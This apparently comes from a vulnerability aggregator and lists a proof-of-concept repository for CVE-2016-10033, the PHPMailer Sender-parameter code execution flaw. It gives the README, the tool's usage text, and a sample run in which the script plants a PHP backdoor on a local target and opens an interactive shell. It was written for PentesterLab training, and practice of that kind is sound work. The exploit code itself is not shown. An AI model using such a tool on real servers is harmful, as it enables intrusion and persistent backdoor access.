CVE-2016-10033 PoC — PHPMailer 安全漏洞

Source

https://github.com/sealldeveloper/CVE-2016-10033-PoC

Associated Vulnerability

Title:PHPMailer 安全漏洞 (CVE-2016-10033)
Description:The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.

Description

A PoC of CVE-2016-10033 I made for PentesterLab

Readme

# CVE-2016-10033-PoC

Wrote this for PentesterLab

> If you are from PentesterLab's don't cheat, it's alot better to learn.

Hope it's useful to someone, if not to me in the future :)

Has interactive shell, nice argparse stuff asw

## Usage
```
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL
  --backdoor BACKDOOR  Backdoor path
  --proxy              Use local proxy
  --raw                Show raw output
  --no-color           Disable colored output
```

## Example
```bash
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data
```

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!